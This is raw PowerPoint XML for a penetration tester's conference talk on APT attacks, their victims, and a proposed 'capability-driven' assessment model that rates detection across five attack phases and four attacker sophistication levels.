            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Citi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.bankinfosecurity.eu/articles.php?art_id=3724</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>High Level Government Officials:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.bbc.co.uk/news/world-us-canada-13635912</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>IOC &amp; UN:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://packetstormsecurity.org/news/view/19619/Governments-IOC-And-UN-Hit-By-Massive-Cyber-Attack.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Global oil, Energy, and Petrochemical Companies:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="do-it-onlin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81600" y="1752600"/>
            <a:ext cx="347472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228600" y="304800"/>
            <a:ext cx="86868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Who Got Owned? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Small-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MidSized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Companies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endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>The areas which are most attacked include: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Car manufacturing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Renewable energies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Chemistry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Optics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>X-ray technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Machinery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Materials research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Armaments </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1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Information being stolen is not only related to research and development, but also management </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1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techniques and marketing strategies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="14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0"/>
            <a:ext cx="35242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066800"/>
            <a:ext cx="8382000" cy="510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sz="2800" dirty="0" smtClean="0"/>
              <a:t>Most of these organizations in the previous slides:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  Have a regularly updated information assurance program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  Have a configuration management and change control program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  Have a dedicated IT Security Budget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  Have dedicated IT Security staff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  Are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>pentested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> at least annually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  Are compliant (PCI, FISMA, ISO 27000, SOX, DIACAP, etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>What do they have in common?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>They were all owned by APT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5648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0"/>
            <a:ext cx="8229600" cy="99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What’s up with APT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3820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Strategy without tactics is the slowest route to victory. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"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Tactics without strategy is the noise before defeat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"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~Sun Tzu~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Too many people think it’s about “Advanced” hacking (0-day exploits, bleeding edge hacking techniques like custom protocols, and custom encryptions) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Although that advanced stuff can be part of it. It’s more about “persistence, tactics, and most importantly meeting the objective”</a:t>
            </a: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sz="2000" dirty="0" smtClean="0"/>
              <a:t>Less “persistent”… more “determined”  they don’t stop at the end of the week</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The objective is to steal the target company’s important shit!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All they want is all you got!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"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0"/>
            <a:ext cx="8229600" cy="99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APT vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600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3820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So how do the previous slides match up to current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> objectives/goals?</a:t>
            </a:r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It DOESN’T!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>At the end of the week, what do you do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>What about scope limitations?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 smtClean="0"/>
              <a:t>Wait, what about “goal oriented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”??!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Domain Admin is a stupid “goal”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Stealing what makes a company money is a better goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Add to that, can you detect that theft in real time or within X hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>What level of attacker can you detect?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46481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This Is What It Is All About (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Business Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>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752600"/>
            <a:ext cx="8382000" cy="3657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endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="C:\Users\j0e\Documents\My Dropbox\BigBangTheory\6-SlidesInWork\Images\Changing-Threat-Landsca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8722411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2296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Vulnerability Driven Industry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83820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IT Security is focused on minimizing the presence of vulnerabilities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133600"/>
            <a:ext cx="5257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2296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Lots of People Talk About How APT Works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83820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This stuff is good, but there are some issues with this….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>We’ll explain in a few min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1026" name="Picture 2" descr="C:\Users\Public\Pictures\pix\APT-Methodology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86000"/>
            <a:ext cx="3135313" cy="3016250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3" descr="C:\Users\Public\Pictures\pix\APT-Methodology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362200"/>
            <a:ext cx="2819400" cy="1959507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="C:\Users\Public\Pictures\pix\APT-Methodology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267200"/>
            <a:ext cx="3589779" cy="2087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eader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ooter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43000" y="2057400"/>
            <a:ext cx="7026275" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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 dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>News Flash......</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APT Doesn’t Rely On Vulnerabilities!!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1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8600" y="2514600"/>
            <a:ext cx="8458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565150" indent="-565150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rgbClr val="FF6600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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="16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1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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="1600200"/>
            <a:ext cx="7026275" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chris Gates.... Who the heck are you? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0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8600" y="2514600"/>
            <a:ext cx="8458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r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A Network/Web Application/Red Team Penetration Tester</a:t>
            </a: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sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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 smtClean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r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A.K.A:</a:t>
            </a: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r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The short white bald guy at security conferences  </a:t>
            </a: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r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(I know, that doesn’t really narrow it down)</a:t>
            </a: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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="16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1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2296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Data Driven Assessments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83820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Some more “forward leaning” companies perform “Data Driven” assessments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Get company to identify what’s important…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Go after it…Can I get to it?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Vary rare to focus on detection and response along the way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6035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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="914400"/>
            <a:ext cx="7026275" cy="1219199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What Has To Happen???</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What Needs To Change???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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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057400"/>
            <a:ext cx="845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451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2296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Vulnerability Driven VS. Capability Driven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83820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IT Security Industry is currently focused on minimizing the presence of vulnerabilities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We’re recommending a change in focus to what attacker tactics/techniques you can detect and respond to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More importantly what level of sophistication of attacker tactics/techniques you can detect and respond to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We call this “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Capability Driven Security Assessments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>” 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2296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>Evaluating Capabilities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83820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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>We’ve broken common APT attack tactics into 5 phases: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Targeting &amp; Information Gathering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Initial Entry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Post-Exploitation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Lateral Movement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Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfiltration</a:t>
            </a:r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09039189"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="1295400"/>
          <a:ext cx="8839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http://ichitaita.com/wordpress/wp-content/uploads/2010/03/no-spoon-300x2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3276600"/>
            <a:ext cx="1922319" cy="1409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853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2296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>Evaluating Capabilities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83820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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Or looks like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty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74495" y="2438400"/>
            <a:ext cx="8516995" cy="3591543"/>
            <a:chOff x="174495" y="1992775"/>
            <a:chExt cx="8516995" cy="3591543"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="174495" y="2920576"/>
              <a:ext cx="1987299" cy="16760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Attack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="28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46553" y="2920576"/>
              <a:ext cx="1987299" cy="16760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Collection</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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704191" y="2920576"/>
              <a:ext cx="1987299" cy="16760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Exfiltration</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="28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62665" y="2920576"/>
              <a:ext cx="1987299" cy="16760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Access</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Curved Down Arrow 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1754589" y="1992775"/>
              <a:ext cx="1216152" cy="731520"/>
            </a:xfrm>
            <a:prstGeom prst="curvedDownArrow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urved Down Arrow 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4097865" y="1992775"/>
              <a:ext cx="1216152" cy="731520"/>
            </a:xfrm>
            <a:prstGeom prst="curvedDownArrow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urved Down Arrow 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6096115" y="1992775"/>
              <a:ext cx="1216152" cy="731520"/>
            </a:xfrm>
            <a:prstGeom prst="curvedDownArrow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urved Down Arrow 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1571125" y="4852798"/>
              <a:ext cx="5557678" cy="731520"/>
            </a:xfrm>
            <a:prstGeom prst="curvedDownArrow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5753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500" y="925083"/>
            <a:ext cx="7772400" cy="584775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How the Attack Works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00800"/>
            <a:ext cx="617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From: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>Mandiant</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\cg\Pictures\blogposts\IOmagement\mandiant-methodolog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490433" cy="458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429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2296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>Evaluating Capabilities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83820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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Within each phase we’ve got 4 levels of sophistication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Level 1:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Kiddie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Level 2:	Got some game</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Level 3:	Organized crime/hacker for hire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Level 4:	State sponsored</a:t>
            </a:r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288426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2296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Evaluating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Capabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600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83820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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Within each phase we’ve got 4 levels of sophistication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Level 1:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
